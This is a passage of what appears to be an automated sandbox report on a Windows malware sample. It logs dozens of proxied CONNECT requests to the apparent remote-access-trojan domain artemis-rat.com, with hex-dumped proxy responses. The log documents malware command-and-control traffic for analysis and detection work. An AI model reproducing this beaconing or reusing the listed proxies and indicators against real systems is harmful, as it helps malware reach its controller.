                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at root@server.ariabirdpoducts.com to inform them of the
                                              Mar 11, 2024 08:37:50.356170893 CET315INData Raw: 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c
                                              Data Ascii: time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while t


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1615192.168.2.454947114.55.84.12300017284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.772856951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.125478983 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1616192.168.2.453202146.59.18.246498717284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.784250021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.866313934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.866693974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.908591032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:49.069363117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:01.084923029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:13.131923914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:37.134829044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1617192.168.2.45500638.54.95.1980607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.807784081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.366389990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.020116091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.366861105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.054130077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.705777884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366466045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:40.663340092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:51.163136959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1618192.168.2.454984198.12.85.211807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.808634043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.073863029 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                                              Data Ascii: Backend not available


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1619192.168.2.454951138.36.199.1441537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.810791016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1620192.168.2.454989162.223.94.164807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.810993910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.017502069 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1621192.168.2.455011184.170.249.6541457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.815509081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1622192.168.2.45495058.58.68.218108007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.815717936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1623192.168.2.450260182.52.108.5836297284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.883029938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1624192.168.2.455023104.17.239.10807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.887528896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.042249918 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1625192.168.2.454955211.222.252.18781937284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.888520956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1626192.168.2.455046172.67.181.17807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.890028000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.044670105 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1627192.168.2.45429945.185.163.1119997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.897614956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.466545105 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1628192.168.2.454952200.58.182.8941537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.900058031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1629192.168.2.455111104.25.234.81807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.901153088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.055454016 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1630192.168.2.455016185.121.138.59807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.901160955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.189416885 CET401INHTTP/1.0 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm="login"
                                              Connection: close
                                              Content-type: text/html; charset=utf-8
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1631192.168.2.45511323.227.38.230807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.915733099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.070406914 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1632192.168.2.450394164.92.237.188637227284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.916790962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1633192.168.2.455115162.159.242.10807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.917247057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.078278065 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
